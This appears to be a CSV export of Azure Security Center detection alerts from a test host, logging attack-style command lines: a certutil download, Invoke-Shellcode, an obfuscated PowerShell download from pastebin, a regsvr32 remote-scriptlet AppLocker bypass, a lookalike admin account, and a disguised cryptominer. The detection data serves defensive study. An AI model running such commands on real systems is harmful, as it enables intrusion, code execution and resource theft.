72,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:19,2019-01-15 05:15:19,03e7bf17-8f77-42ca-8ac1-af8258f4d1ca,2518547714805546049_03e7bf17-8f77-42ca-8ac1-af8258f4d1ca,Detection,Microsoft,Suspicious download using Certutil detected,Suspicious download using Certutil detected,Suspicious download using Certutil detected,"Analysis of host data on MSTICALERTSWIN1 detected the use of certutil.exe, a built-in administrator utility, for the download of a binary instead of its mainstream purpose that relates to manipulating certificates and certificate data. Attackers are known to abuse functionality of legitimate administrator tools to perform malicious actions, for example using certutil.exe to download and decode a malicious executable that will then be subsequently executed.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\certutil.exe"",
""Suspicious Command Line"": ""certutil -urlcache -split -f http://127.0.0.1/"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1638"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""certutil.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1638"",
""CommandLine"": ""certutil -urlcache -split -f http://127.0.0.1/"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:19.445395Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:19.445395Z"",
""EndTimeUtc"": ""2019-01-15T05:15:19.445395Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:55,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
73,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,30d988ff-b8d9-45df-8217-e56b0d4d591c,2518547714874872692_30d988ff-b8d9-45df-8217-e56b0d4d591c,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e0"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e0"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
74,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,9b4e4942-d564-4755-862c-7171d52921e3,2518547714859677078_9b4e4942-d564-4755-862c-7171d52921e3,Detection,Microsoft,Detected suspicious named pipe communications,Detected suspicious named pipe communications,Detected suspicious named pipe communications,"Analysis of host data on MSTICALERTSWIN1 detected data being written to a local named pipe from a Windows console command. Named pipes are known to be a channel used by attackers to task and communicate with a malicious implant. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""echo blahtest > \\\\.\\pipe\\blahtest\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1724"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1724"",
""CommandLine"": ""cmd /c \""echo blahtest > \\\\.\\pipe\\blahtest\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.0322921Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.0322921Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.0322921Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
75,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:03,2019-01-15 05:15:03,3c380601-b5ad-4fff-9cdb-24528a3a19fd,2518547714966107270_3c380601-b5ad-4fff-9cdb-24528a3a19fd,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x2a8"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x2a8"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:03.3892729Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T05:15:03.3892729Z"",
""EndTimeUtc"": ""2019-01-15T05:15:03.3892729Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:10,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
76,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,1c680842-2a1d-40c0-a6e4-32e5dd144647,2518547714887413669_1c680842-2a1d-40c0-a6e4-32e5dd144647,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0xfaac27"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x103c"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.258633Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.258633Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
77,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,4fa0022e-f431-4ba1-ae5f-ee23247e0853,2518547714887413669_4fa0022e-f431-4ba1-ae5f-ee23247e0853,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x103c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x103c"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.258633Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.258633Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.258633Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
78,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,77211491-86de-4295-82bc-38e332fe1112,2518547714871530079_77211491-86de-4295-82bc-38e332fe1112,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the commandline.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x154c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x154c"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.846992Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.846992Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.846992Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
79,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,226cc394-fccf-483d-888a-beafad2ed4a4,2518547714879317674_226cc394-fccf-483d-888a-beafad2ed4a4,Detection,Microsoft,Detected suspicious commandline arguments,Detected suspicious commandline arguments,Detected suspicious commandline arguments,Analysis of host data on MSTICALERTSWIN1 detected suspicious commandline arguments that have been used in conjunction with a reverse shell used by activity group HYDROGEN.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\implant.exe"",
""Suspicious Command Line"": ""implant.exe -b -t -m"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x140c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: HYDROGEN\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-HYDROGEN.pdf?sv=2018-03-28&sr=b&sig=l6t8ZuaUnahnOzfG6x08jl0SnF%2Bad6OtU8cbvfK0AV8%3D&spr=https&st=2019-01-14T11:45:28Z&se=2019-04-14T12:00:28Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""implant.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x140c"",
""CommandLine"": ""implant.exe -b -t -m"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.0682325Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.0682325Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.0682325Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
80,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:10,2019-01-15 05:15:10,9e449abd-e67b-4ec8-a191-e688d7d63e26,2518547714892475358_9e449abd-e67b-4ec8-a191-e688d7d63e26,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xd10"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xd10"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:10.7524641Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:10.7524641Z"",
""EndTimeUtc"": ""2019-01-15T05:15:10.7524641Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
